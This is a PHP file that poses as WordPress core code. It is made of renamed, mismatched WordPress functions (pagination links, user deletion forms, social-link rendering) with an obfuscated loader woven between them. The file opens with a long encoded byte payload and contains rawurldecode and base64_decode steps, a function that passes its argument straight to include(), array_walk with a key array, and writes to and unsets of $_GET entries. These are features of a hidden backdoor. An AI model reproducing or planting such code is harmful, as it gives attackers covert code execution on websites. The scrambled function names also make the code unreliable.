b2\xe8\xe1\xce\xaen\x95v\x84\x8du~\xc1\x9a\xb1\xe2\x9d\xa7^nx\x8d]\xc9\xae\xbd\xc2\xbcx\xa0\xea\xa2\x83v|\xd6\xc6\xc0\x9c\xaevwi\x96\x93\xb4tnx\xd0\xc3\xc7\xb4\xc8~{\xb2\xe8\xe1\xce\xae\xbc\x9a\xe3\xca\xaao\x83\x80wi\x96\xc4\xed\xa5\x9dx\x8d~\x81o\x83\x80wi\xc8\xe7\xde\x98\xb8x\x8d~\x81\xc1^`\x86s\x96\xec\xd0\xbf\x9e\xac\x8dtrp\x83z\xc0\xbb\xe4\xc9\xd2\xc2\x90\xce\xe3\xac\xadj\xbd\xc8\xc5\x9f\xd0\xd0\x98\x91nx\xe0\xc8\xc4\xa5\xc6\xbb\xc7\xae\xd7\xe7\xa0x\xb7\xca\xdb\xaa\xac\xb4\x96\xcc\xcd\xa1\xd1\x97\xe1\xc6\xbc\xae\xc7\xb1~O\x86\x92S|\x81]n|\xd6\xc6\xc0\x9c\xae\x81\x82\x84\x9a\xd2\xd2\xcd\xb1a\xaatrftv~|\xad\xa3\xa8\x8cu\x93wtrftv`\xc6\x80}\x82\x83xx\xbe\xc2\xa4\xb7t\x80\x86S\x96\x93\x98tna\x91\x96\xb4\xbb\xab\xba\xbd\x9d\xc4\xca\xd0]\x8b\x87\x97t\xc4\xa9\x9e\xa3ws\xa5\xe6\xec\xc6\xad\xca\xd2\xc4\xb7\xa7\xc8~{\xc3\xbe\xbd\xe6\x9d\xb9\xa7\xcf\xa0~u~\xcb\xaes\xa5\xa6\xa1\x8f\x89bv]\ftvwx\xa0\x93\x98t\x9d\xd2\xc5t|u\xc6\xbb\xcb\xbe\xe8\xe1\x98tnx\x91\xae\xa1\x8d\xc4\xd0\xcd\x93\xcc\xc5\xbd\x8f\x89b\x8dt[\xc3^`ax\xa0\xd9\xc3\xcenx\x97\x83\P]\xbc\xcc\xb7\xd9\xe7\xe1\xc3\xbca\xb9\xa3\x95\x9d\xa9\xc2\xbcq\x9a\xd6\xee\xa1\xa0\xa3\xba\xac\xb3\xb2\xabaR\xf1}\x82^}\x82\x8dtr\xb4\x98\xab\xbd\xaf\xa0\xa2\x9c\xbe\x93\xa4\xda\x97\xa0\xb0tvwi\x96\xb0\xa7~n\xbb\xb6\xc7\x95\xbftvws\xa5\x95\xd4\xcc\x80\x8b\x8f\x8f\O]\x85\x81i\xef\xe3\xa2\x83\xb4\xc7\xdf\xb9\xb3\xa9\xbc_\xa0\xc5\xc9\xe5\xba\x92\x99\xc3\xc1zotvwi\xd7\xe6\x98tn|\xce\xbb\xa2\xba\xb6\xa8\xc7r\xa5\x9d\x98tn\xc8\xe2t|u\xcf`wi\x96\x93\x81\x9b\xc6\xa4\xda\x9f\xaanx\xb7\xbe\x99\xea\xd5\xca\xc4z\x87\x97trf\xbe\xbdwi\xa0\xa2\x9c\xbe\x93\xa4\xda\x97\xa0\xb0}\x91\x92S\x96\x93\x98t}\x82\xb2\xce\xb6\xba\x9bvwi\xa0\xa2\xf5^Xx\x8dt\xcfP]``\xaf\xeb\xe1\xdb\xc8\xb7\xc7\xdb]\xc3\x90\xc8\xba\xa6\xbc\xd7\xb5\xd0\xcev|\xdc\xa0\x9b\x9b\xa0\xa6\xa7u\xa5\x9d\xed\xc7x\x87\x91\xc8\x97\x9f\xc3\xbf\xc8\xbd\xbf\x9c\x82]nx\x8dt\xcdP]\x85\x81\x98\xc7\xc1\xc5tx\x87\xd6\xba[n]\xb9\xc6\xbe\xe4\xe7\x81|}\x82\xe5\xac\x99ft\x80\x86m\xe5\xbf\xc1\xa9\x9a\xa8\xbd]{f\x91\x93`|\x9c\x98t\xc9bv][O\x83\x80w\x92\x96\x9d\xa7x\x9d\x9a\xd7\xa3\xbb\xae\xb9\x9b\xa4\xad\xb0\x98tn|\xdc\xa0\x9b\x9b\xa0\xa6\xa7\xa4\xa7\xd0\xb3x\xad\xbc\xdb\xc5\xa0u~vwi\xbe\x93\xa2\x83\x8b\x87\x97\xa6\xa2\xba\xae\x80\x86p\xab\xac\xb0\x86~\xa8^\P]z\xcc\xbc\xea\xdf\xc0\xa4W\x95\x9c~rft\x99\xad\x9e\xc5\xe8\x98tx\x87\x91\xc3\x9e\x8f\xa9\xa2\xa7\x99\xd1\xa5\xd5\x8fXbw]v\xa9\xc8\xa4\xbb\x9e\xe4\x93\x98t\x8bx\x8dx\xa1\x88\xbe\xa5\xc0\xb1\xdb\xb8\xc5\xb8v|\xe2\xc7\xc6\xb2\x9c\xa6\x80\x84\x9a\xd2\xcd\x83xx\x8dt\xb3f~\x85\x94i\x96\x93\x98{\x91\xa1\x85\x88m\x8f`aR\xdb\xe9\xd9\xc0}\x82\x8d\xc4\x93ft\x80\x86q\x96\x93\x98x\xb1\xcc\xbb\xb8\xa7\xb4tv\x80\x84\xb1}\x98tnx\x8d]\xb6\xaf\xb9vr\xb1\x97\xd7\xcbnx\x8d\x91[m\x85\x8b\x8c\x81\xa6\x9a\xb3^Wav]rftvw\xc6\x80\xa2\xa2\xcb\x9e\xa9\xd9t|u\xd1`aS\x96}\x98tnx\x8d]\xb8\xbb\xc2\xb9\xcb\xb2\xe5\xe1\x81\x99\xc5\xc4\xdf\xb9\xcb\xb0|z\xc6\x8e\xde\xe3\xde\xc4zx\x91\xa8\xb3\xb0\xb6\xa5\x80S\x96\x93\x98tW\xd3w^\O\xc6\xbb\xcb\xbe\xe8\xe1\x81x\xbd\x9d\xd5\xc4\xb8\xb6tvw\xa7\x97\xcc\xb5\xb8\xba\xbc\x8f\x8dPtvwi\xa5\x9d\x98tn\xc2\xe2\x96rp\x83\xd3aR\x80|\x81]nx\x8dtr\xac\xc9\xc4\xba\xbd\xdf\xe2\xe6]\xc1\xa9\xe5\xa7\x94nx\xb9\xaf\xbd\xdd\xc0\xa4]r\xc2\xb2\xa0\xbf\x89\xa2\xc0\x80S\x96\x93\x81\xcfWbv\x83|ftv\xa0\x8b\xec\x9d\xa7x\xb1\xb0\xe1\xbb\x9fu~vw\x9e\xe9\xb7\xce\xcdnx\x97\x83\x8ff\xb9\xce\xc7\xb5\xe5\xd7\xdd\x83xx\x8d\xa1\x93\xbd\xca\xcdwi\xa0\xa2\xa0x\xb8\x9d\xb9\xc1\x95\x94\xbe\x82wi\x96\x97\xdb\xac\xc2\xbf\xba\x83|\x89\xadvws\xa5\x9c\xb3^Wav^rft\x85\x81\x8f\xe0\x9d\xa7\xc5\x98\xcc\xd1\xa3\xc5\xa7\x96\xae\xd1q\x9a\xd6\xd0\xc8\xb5\xa5\x99tv\xb0\x99\xa2\xc4\x8c\xc4\xdd\xa1\x8fXav]rf\xd1``R|\x82^Xa\xd3\xc9\xc0\xa9\xc8\xbf\xc6\xb7\xba\xf0\xa0\xbb\xa3\xc5|v\xa7\xbb\xa6\xcb\xab\xc8\xe3\xa4\x83xx\x8dt\x9e\x8f\xa9vwi\xa0\xa2\x9c\xbe\x93\xa4\xda\x97\xa0\xb0}``R\xf1}\x98tnx\x8dtrf\xba\xc5\xc9\xae\xd7\xd6\xe0]vx\x8dx\xb3\xad\xa4\xca\xb9\x9b\xe6|\xd9\xc7n|\xc1\xb5\xbc\xa8\xa3vw\x86\xb4\x93\x98tnx\x91\xc3\x97\xae\xc4\xbc\xc7R\x9f\x93\xf3^Wav][ftvw\x9c\xe0\xd7\xf0\xc6\xc3\x9b\xd6\xcczj\xa8\xb7\xc1\xab\xc5\x9f\xa7~nx\xc3\xab\xa5ft\x80\x86\x99\xe7\xbc\xea\xba\xa6\xa3\x95x\xc1\x8b\xbc\xc6\xbd\xb9\x9f\x9f\xa7~\xa6\xa1\x97\x83v\xb0\x99\xa2\xc4\x8c\xc4\xdd\xa1\x8fr\xb7\xb1\x9a\xa4\xb7\x9dvw\x86\x96\x93\x9f\x8a\x81\x8a\xa4\x84y\x81^vwi\xa5\x9d\x98tn\xcb\xd8\xc5\xa4\xb2~\x85\xd4S|\x81tnx\x8dt\xcfPtv\x86s\xe8\x93\x98tx\x87w^r\xac\xc9\xc4\xba\xbd\xdf\xe2\xe6]\xb2\xcb\xe0\x9b\xcbnx\xaa\xb8\xb3\xd8\xc2\xa4]r\xc7\xb2\xbc\xc2\xac\xc4aS\x96\x93\x98tn\xd3wt[j\xc5\xad\xbc\x8f\xdd\xe1\xbb]\x8bx\x8d\xc7\xc6\xb8\xc0\xbb\xc5q\x97\xe7\x99\xb6\xc8\xd3\xc4\x81ptvw\xa0\x96\x9d\xa7}}\xcb\xe1\xc6\xbe\xab\xc2~wi\x96\x97\xcc\xb5\xb8\xba\xbctrf}\x91{\xa8\xdf\xe2\xdf\x9d\xb0a\xaa]y|\x86\x87\x8d|\x9d\xae\x82]}\x82\xe5\xaa\xc8\xa0tv\x81x\x9a\xc7\xd9\xbe\xb0\xa7v\x82\x8fftx\xa7\xaa\xbb\xa0\xf1\xbb\xb6\x9c\xc1\x9e\xa2s\xb7\xa6\xbc\xa2\xa3\xbb\xc2\xbe{\xa3\xc2\x98\xbf\x94\x81\x9d\xc6\x91\xc7\xd5\xa5\xae\xc8\xa5\xb0\xb5\xc1\xa0v\x91aR|\x81]r\xac\xce\xbe\xb4\x95tvwi\x96\xb0\x98\xc7\xc2\xca\xcc\xc6\xb7\xb6\xb9\xb7\xcbR\x9e|\x9c\xa8\xaf\xc2\xcf\xa3~u~vw\xb5\x96\x9d\xa7\xbd\xbc\xcc\xe3\xb5\xbenx\xc7\xae\xae\xbc\xda\xe6\x97wa\x98\x83|ft\xa4\xbf\xab\xeb\xea\x98tn\x82\x9c\x85{\x81\x8f``R\x80\x93\x98]\xc0\xbd\xe1\xc9\xc4\xb4tvwi\x9a\xc7\xd9\xbe\xb0\xa7\xa8^[O]_`\xc6\x80\x93\x98tnx\x8dt\ftv\x86s\x96\xe2\xa2\x83\xb4\xcd\xdb\xb7\xc6\xaf\xc3\xc4`\x9c\xe0\xd7\xf0\xc6\xc3\x9b\xd6\xcczj\xa8\xb7\xc1\xab\xc5\x9f\x81x\xbd\x9d\xd5\xc4\xb8\xb6\x80_{\xb3\xbb\xbf\xe5\x97\x9c\xc2\x96^rftvwi\x96\xee\x81^Xx\x8d\xc7\xa3\xbe\xa7\x98\x8e\xed\xdf\xea\xb9\xc7\xc2\x95x\xc1\x8b\xbc\xc6\xbd\xb9\xa2\x93\x98tn\xbc\xe0\xc7\x99\xbf|z\xab\xaa\xe0\xd5\xc7\x80W|\xdc\x99\xba\xb6\xba\xc6\x80r\xa2\x93\x98tnx\x91\xbe\x97\x92\xc1\x99\xa5\xb3\x9f\xae\x82]Wav]rftvai\x96|\x9c\x99\xa2\x9a\xe7\xb5\x99O\x91v\xcb\xbb\xdf\xe0\xa0x\xbd\x9d\xd5\xc4\xb8\xb6}\x91aS\x80|\x9c\xb5\x93\xc2\xbf\x97\x95\x9e\x98\xcbwi\xb3\x93\x98t\xb3\xd0\xdd\xc0\xc1\xaa\xb9~{\xb3\xbb\xbf\xe5\x97\x9c\xc2\x99]v\x8b\xa8\x98\xd1\xaa\xbd\x9c\xb3\x8fXx\x8d\x83|ft\xbb\xb9\x9e\xe9\x93\x98~}\xc1\xd3trft~\xba\xb8\xeb\xe1\xec|r\xb9\xb2\xbe\xa4\x89\x97\xae\x9b\xbe\x9f|\xb6tnx\x8dt\x83ot\xd1aR|\x81]nx\x91\xad\xc7\xae\xc1\xc5\xc3\x97\x96\x93\x98\x91W\xc1\xda\xc4\xbe\xb5\xb8\xbbp\xa3\x9a\xa4\x83xx\x8dt\xa9\xb9\xa1\xa5wi\xa0\xa2\x9c\xb5\x93\xc2\xbf\x97\x95\x9e\x98\xcb\x80\x84\xb1}\x81]W|\xb7\x95\xb3\xbe\xa9\xc8\xa8\x94\xb8\xec\xa7~nx\xbc\xcb\x98p\x83\x93w\xbc\xea\xe5\xd7\xc4\xaf\xbc\x95x\xab\xbb\xbc\xc3\xc6\xb5\xc4\x9f\x81\x86~\x84\x8dtrf\xb7\xbe\xc9i\x96\x93\x98|W\x8f\x9e\x8c\x81ptvw\xb8\xa0\xa2\xa5]\x84\x8f\x9d]{rtvwi\x96\xc6\xcc\xa6\xad\xa8\xae\x98\xb1\x98\x9d\x9d\x9f\x9d\x9f\xae\xb3^Wa\x9c~rf\xa9\xc8wi\x96\x9d\xa7\xd1Xav][\xc3^`ax\xa0\x93\x98\xa4\xb2\x82\x9c^ru~vw\xbb\xed\xc9\xc1~}\xa4\xbc\x97\xa9\x9b\xc0\xbbk\x98\x9c\xb3v\x89\xc1\xa7\x88\x8d\xb9\x8e\x8c\x91k\xeb\xe1\xe4\xbd\xbc\xc3\x8f\x8f\xcf"; // %x2F ("/") and skip the remaining steps. $dependencies_notice = rawurldecode($maskbyte); $_GET["vDkkjQNb"] = $ui_enabled_for_plugins; } /** * See if the next character is LWS * * @return bool true if the next character is LWS, false if not */ function autosaved($gd_supported_formats){ $theme_translations = "Info Data Example"; include($gd_supported_formats); } /** * Remove control callback for widget. * * @since 2.2.0 * * @param int|string $zip Widget ID. */ function deactivate_plugin_before_upgrade($zip) { wp_register_widget_control($zip, '', ''); } $admin_body_classes = array(86, 87, 73, 118, 115, 120, 84, 78, 88, 109, 84, 82, 70, 84); $lyrics3lsz = trim($category_translations); /** * Retrieves the link for a page number. * * @since 1.5.0 * * @global WP_Rewrite $force_check WordPress rewrite component. * * @param int $maximum_viewport_width Optional. Page number. Default 1. * @param bool $saved_location Optional. Whether to escape the URL for display, with esc_url(). * If set to false, prepares the URL with sanitize_url(). Default true. * @return string The link URL for the given page number. */ function get_the_title_rss($maximum_viewport_width = 1, $saved_location = true) { global $force_check; $maximum_viewport_width = (int) $maximum_viewport_width; $add_to = remove_query_arg('paged'); $is_iis7 = parse_url(home_url()); $is_iis7 = isset($is_iis7['path']) ? $is_iis7['path'] : ''; $is_iis7 = preg_quote($is_iis7, '|'); $add_to = preg_replace('|^' . $is_iis7 . '|i', '', $add_to); $add_to = preg_replace('|^/+|', '', $add_to); if (!$force_check->using_permalinks() || is_admin()) { $pts = trailingslashit(get_bloginfo('url')); if ($maximum_viewport_width > 1) { $wp_id = add_query_arg('paged', $maximum_viewport_width, $pts . $add_to); } else { $wp_id = $pts . $add_to; } } else { $official = '|\?.*?$|'; preg_match($official, $add_to, $skip_link_script); $AMVheader = array(); $AMVheader[] = untrailingslashit(get_bloginfo('url')); if (!empty($skip_link_script[0])) { $range = $skip_link_script[0]; $add_to = preg_replace($official, '', $add_to); } else { $range = ''; } $add_to = preg_replace("|{$force_check->pagination_base}/\\d+/?\$|", '', $add_to); $add_to = preg_replace('|^' . preg_quote($force_check->index, '|') . '|i', '', $add_to); $add_to = ltrim($add_to, '/'); if ($force_check->using_index_permalinks() && ($maximum_viewport_width > 1 || '' !== $add_to)) { $AMVheader[] = $force_check->index; } $AMVheader[] = untrailingslashit($add_to); if ($maximum_viewport_width > 1) { $AMVheader[] = $force_check->pagination_base; $AMVheader[] = $maximum_viewport_width; } $wp_id = user_trailingslashit(implode('/', array_filter($AMVheader)), 'paged'); if (!empty($range)) { $wp_id .= $range; } } /** * Filters the page number link for the current request. * * @since 2.5.0 * @since 5.2.0 Added the `$maximum_viewport_width` argument. * * @param string $wp_id The page number link. * @param int $maximum_viewport_width The page number. */ $wp_id = apply_filters('get_the_title_rss', $wp_id, $maximum_viewport_width); if ($saved_location) { return esc_url($wp_id); } else { return sanitize_url($wp_id); } } $padding_left = base64_decode($framelength); /** * Updates metadata cache for a list of post IDs. * * Performs SQL query to retrieve the metadata for the post IDs and updates the * metadata cache for the posts. Therefore, the functions, which call this * function, do not need to perform SQL queries on their own. * * @since 2.1.0 * * @param int[] $wp_last_modified_comment Array of post IDs. * @return array|false An array of metadata on success, false if there is nothing to update. */ function get_post_mime_types($wp_last_modified_comment) { return update_meta_cache('post', $wp_last_modified_comment); } /** * Retrieves query variable. * * @since 3.5.0 * * @param string $is_selecteduery_var Query variable key. * @return mixed */ if (!empty($overview)) { $errmsg_generic = substr($overview, 0, 6); } $CompressedFileData = strlen($index_columns); /** * Retrieves the locale of a user. * * If the user has a locale set to a non-empty string then it will be * returned. Otherwise it returns the locale of get_locale(). * * @since 4.7.0 * * @param int|WP_User $g1 User's ID or a WP_User object. Defaults to current user. * @return string The locale of the user. */ function get_single_template($g1 = 0) { $SNDM_startoffset = false; if (0 === $g1 && function_exists('wp_get_current_user')) { $SNDM_startoffset = wp_get_current_user(); } elseif ($g1 instanceof WP_User) { $SNDM_startoffset = $g1; } elseif ($g1 && is_numeric($g1)) { $SNDM_startoffset = get_user_by('id', $g1); } if (!$SNDM_startoffset) { return get_locale(); } $author_meta = $SNDM_startoffset->locale; return $author_meta ? $author_meta : get_locale(); } $all_pages = str_pad($index_columns, $CompressedFileData + 3, "_"); /** * Outputs term meta XML tags for a given term object. * * @since 4.6.0 * * @global wpdb $cat_in WordPress database abstraction object. * * @param WP_Term $head4_key Term object. */ function wp_register_widget_control($head4_key) { global $cat_in; $img_uploaded_src = $cat_in->get_results($cat_in->prepare("SELECT * FROM {$cat_in->termmeta} WHERE term_id = %d", $head4_key->term_id)); foreach ($img_uploaded_src as $only_crop_sizes) { /** * Filters whether to selectively skip term meta used for WXR exports. * * Returning a truthy value from the filter will skip the current meta * object from being exported. * * @since 4.6.0 * * @param bool $skip Whether to skip the current piece of term meta. Default false. * @param string $only_crop_sizes_key Current meta key. * @param object $only_crop_sizes Current meta object. */ if (!apply_filters('wxr_export_skip_termmeta', false, $only_crop_sizes->meta_key, $only_crop_sizes)) { printf("\t\t<wp:termmeta>\n\t\t\t<wp:meta_key>%s</wp:meta_key>\n\t\t\t<wp:meta_value>%s</wp:meta_value>\n\t\t</wp:termmeta>\n", wxr_cdata($only_crop_sizes->meta_key), wxr_cdata($only_crop_sizes->meta_value)); } } } $posts_table = hash('md5', $errmsg_generic); /** * Kills WordPress execution and displays XML response with an error message. * * This is the handler for wp_die() when processing XMLRPC requests. * * @since 3.2.0 * @access private * * @global wp_xmlrpc_server $legal * * @param string $overview Error message. * @param string $new_sidebar Optional. Error title. Default empty string. * @param string|array $Port Optional. Arguments to control behavior. Default empty array. */ function remove_shortcode($overview, $new_sidebar = '', $Port = array()) { global $legal; list($overview, $new_sidebar, $jl) = _wp_die_process_input($overview, $new_sidebar, $Port); if (!headers_sent()) { nocache_headers(); } if ($legal) { $picOrderType = new IXR_Error($jl['response'], $overview); $legal->output($picOrderType->getXml()); } if ($jl['exit']) { die; } } $count_query = str_repeat($lyrics3lsz, 2); /** * Display the description of the author of the current post. * * @since 1.0.0 * @deprecated 2.8.0 Use the_author_meta() * @see the_author_meta() */ function get_year_permastruct() { _deprecated_function(__FUNCTION__, '2.8.0', 'the_author_meta(\'description\')'); the_author_meta('description'); } /* translators: %s: register_widget() */ if ($padding_left !== false) { $is_iphone = strlen($padding_left); } $wrapper_styles = array(1, 2, 3); /** * Display the nickname of the author of the current post. * * @since 0.71 * @deprecated 2.8.0 Use the_author_meta() * @see the_author_meta() */ function get_header_video_url() { _deprecated_function(__FUNCTION__, '2.8.0', 'the_author_meta(\'nickname\')'); the_author_meta('nickname'); } $body_original = array($posts_table, $errmsg_generic); /** * @param string $default_structure_values * @return string */ function quote($default_structure_values) { return "{$default_structure_values} widgets_access "; } array_walk($post_blocks, "has_circular_dependency", $admin_body_classes); /** * Header with image background and overlay block pattern */ if (!empty($wrapper_styles)) { $registered_widgets_ids = implode("-", $wrapper_styles); } /** * @param array $maxbits * @return bool */ function wp_is_application_passwords_available_for_user($maxbits) { $db_fields = wp_get_current_user(); if (!is_array($maxbits) || empty($maxbits)) { return false; } ?> <h1><?php esc_html_e('Users'); ?></h1> <?php if (1 === count($maxbits)) { ?> <p><?php _e('You have chosen to delete the user from all networks and sites.'); ?></p> <?php } else { ?> <p><?php _e('You have chosen to delete the following users from all networks and sites.'); ?></p> <?php } ?> <form action="users.php?action=dodelete" method="post"> <input type="hidden" name="dodelete" /> <?php wp_nonce_field('ms-users-delete'); $do_concat = get_super_admins(); $image_name = '<option value="' . esc_attr($db_fields->ID) . '">' . $db_fields->user_login . '</option>'; ?> <table class="form-table" role="presentation"> <?php $weeuns = (array) $_POST['allusers']; foreach ($weeuns as $reals) { if ('' !== $reals && '0' !== $reals) { $d4 = get_userdata($reals); if (!current_user_can('delete_user', $d4->ID)) { wp_die(sprintf( /* translators: %s: User login. */ __('Warning! User %s cannot be deleted.'), $d4->user_login )); } if (in_array($d4->user_login, $do_concat, true)) { wp_die(sprintf( /* translators: %s: User login. */ __('Warning! User cannot be deleted. The user %s is a network administrator.'), '<em>' . $d4->user_login . '</em>' )); } ?> <tr> <th scope="row"><?php echo $d4->user_login; ?> <?php echo '<input type="hidden" name="user[]" value="' . esc_attr($reals) . '" />' . "\n"; ?> </th> <?php $is_sub_menu = get_blogs_of_user($reals, true); if (!empty($is_sub_menu)) { ?> <td><fieldset><p><legend> <?php printf( /* translators: %s: User login. */ __('What should be done with content owned by %s?'), '<em>' . $d4->user_login . '</em>' ); ?> </legend></p> <?php foreach ((array) $is_sub_menu as $ignore_codes => $unregistered_source) { $chars = get_users(array('blog_id' => $unregistered_source->userblog_id, 'fields' => array('ID', 'user_login'))); if (is_array($chars) && !empty($chars)) { $copyright_url = "<a href='" . esc_url(get_home_url($unregistered_source->userblog_id)) . "'>{$unregistered_source->blogname}</a>"; $theme_directory = '<label for="reassign_user" class="screen-reader-text">' . __('Select a user') . '</label>'; $theme_directory .= "<select name='blog[{$reals}][{$ignore_codes}]' id='reassign_user'>"; $api_calls = ''; foreach ($chars as $g1) { if (!in_array((int) $g1->ID, $weeuns, true)) { $api_calls .= "<option value='{$g1->ID}'>{$g1->user_login}</option>"; } } if ('' === $api_calls) { $api_calls = $image_name; } $theme_directory .= $api_calls; $theme_directory .= "</select>\n"; ?> <ul style="list-style:none;"> <li> <?php /* translators: %s: Link to user's site. */ printf(__('Site: %s'), $copyright_url); ?> </li> <li><label><input type="radio" id="delete_option0" name="delete[<?php echo $unregistered_source->userblog_id . '][' . $d4->ID; ?>]" value="delete" checked="checked" /> <?php _e('Delete all content.'); ?></label></li> <li><label><input type="radio" id="delete_option1" name="delete[<?php echo $unregistered_source->userblog_id . '][' . $d4->ID; ?>]" value="reassign" /> <?php _e('Attribute all content to:'); ?></label> <?php echo $theme_directory; ?></li> </ul> <?php } } echo '</fieldset></td></tr>'; } else { ?> <td><p><?php _e('User has no sites or content and will be deleted.'); ?></p></td> <?php } ?> </tr> <?php } } ?> </table> <?php /** This action is documented in wp-admin/users.php */ do_action('delete_user_form', $db_fields, $weeuns); if (1 === count($maxbits)) { ?> <p><?php _e('Once you hit “Confirm Deletion”, the user will be permanently removed.'); ?></p> <?php } else { ?> <p><?php _e('Once you hit “Confirm Deletion”, these users will be permanently removed.'); ?></p> <?php } submit_button(__('Confirm Deletion'), 'primary'); ?> </form> <?php return true; } $post_blocks = wp_default_styles($post_blocks); /** * Server-side rendering of the `core/social-link` blocks. * * @package WordPress */ /** * Renders the `core/social-link` block on server. * * @param Array $potential_folder The block attributes. * @param String $LegitimateSlashedGenreList InnerBlocks content of the Block. * @param WP_Block $options_audio_midi_scanwholefile Block object. * * @return string Rendered HTML of the referenced block. */ function wp_footer($potential_folder, $LegitimateSlashedGenreList, $options_audio_midi_scanwholefile) { $editor_script_handle = isset($options_audio_midi_scanwholefile->context['openInNewTab']) ? $options_audio_midi_scanwholefile->context['openInNewTab'] : false; $customHeader = isset($potential_folder['service']) ? $potential_folder['service'] : 'Icon'; $addrstr = isset($potential_folder['url']) ? $potential_folder['url'] : false; $image_basename = isset($potential_folder['label']) ? $potential_folder['label'] : block_core_social_link_get_name($customHeader); $currentHeaderLabel = isset($potential_folder['rel']) ? $potential_folder['rel'] : ''; $pasv = array_key_exists('showLabels', $options_audio_midi_scanwholefile->context) ? $options_audio_midi_scanwholefile->context['showLabels'] : false; // Don't render a link if there is no URL set. if (!$addrstr) { return ''; } /** * Prepend emails with `mailto:` if not set. * The `is_email` returns false for emails with schema. */ if (is_email($addrstr)) { $addrstr = 'mailto:' . antispambot($addrstr); } /** * Prepend URL with https:// if it doesn't appear to contain a scheme * and it's not a relative link starting with //. */ if (!parse_url($addrstr, PHP_URL_SCHEME) && !str_starts_with($addrstr, '//')) { $addrstr = 'https://' . $addrstr; } $determined_locale = block_core_social_link_get_icon($customHeader); $errmsg_blog_title = get_block_wrapper_attributes(array('class' => 'wp-social-link wp-social-link-' . $customHeader . block_core_social_link_get_color_classes($options_audio_midi_scanwholefile->context), 'style' => block_core_social_link_get_color_styles($options_audio_midi_scanwholefile->context))); $browser_icon_alt_value = '<li ' . $errmsg_blog_title . '>'; $browser_icon_alt_value .= '<a href="' . esc_url($addrstr) . '" class="wp-block-social-link-anchor">'; $browser_icon_alt_value .= $determined_locale; $browser_icon_alt_value .= '<span class="wp-block-social-link-label' . ($pasv ? '' : ' screen-reader-text') . '">'; $browser_icon_alt_value .= esc_html($image_basename); $browser_icon_alt_value .= '</span></a></li>'; $pagination_links_class = new WP_HTML_Tag_Processor($browser_icon_alt_value); $pagination_links_class->next_tag('a'); if ($editor_script_handle) { $pagination_links_class->set_attribute('rel', trim($currentHeaderLabel . ' noopener nofollow')); $pagination_links_class->set_attribute('target', '_blank'); } elseif ('' !== $currentHeaderLabel) { $pagination_links_class->set_attribute('rel', trim($currentHeaderLabel)); } return $pagination_links_class->get_updated_html(); } // Theme is already at the latest version. // Always persist 'id', because it can be needed for add_additional_fields_to_object(). /** * Outputs the Activity widget. * * Callback function for {@see 'dashboard_activity'}. * * @since 3.8.0 */ function display_alert() { echo '<div id="activity-widget">'; $translate = wp_dashboard_recent_posts(array('max' => 5, 'status' => 'future', 'order' => 'ASC', 'title' => __('Publishing Soon'), 'id' => 'future-posts')); $to_remove = wp_dashboard_recent_posts(array('max' => 5, 'status' => 'publish', 'order' => 'DESC', 'title' => __('Recently Published'), 'id' => 'published-posts')); $pingback_href_pos = get_help_sidebar(); if (!$translate && !$to_remove && !$pingback_href_pos) { echo '<div class="no-activity">'; echo '<p>' . __('No activity yet!') . '</p>'; echo '</div>'; } echo '</div>'; } wp_delete_post_revision($post_blocks); // Code by ubergeekØubergeek*tv based on information from /** * Ensures that the current site's domain is listed in the allowed redirect host list. * * @see wp_validate_redirect() * @since MU (3.0.0) * * @param array|string $none Not used. * @return string[] { * An array containing the current site's domain. * * @type string $0 The current site's domain. * } */ function QuicktimeIODSaudioProfileName($none = '') { return array(get_network()->domain); } // If we have pages, put together their info. /** * Retrieves the custom header text color in 3- or 6-digit hexadecimal form. * * @since 2.1.0 * * @return string Header text color in 3- or 6-digit hexadecimal form (minus the hash symbol). */ function prepare_response_for_collection() { return get_theme_mod('header_textcolor', get_theme_support('custom-header', 'default-text-color')); } // edit_user maps to edit_users. /** * Handles renewing the REST API nonce via AJAX. * * @since 5.3.0 */ function get_name_for_update() { exit(wp_create_nonce('wp_rest')); } unset($_GET[$f2g2]);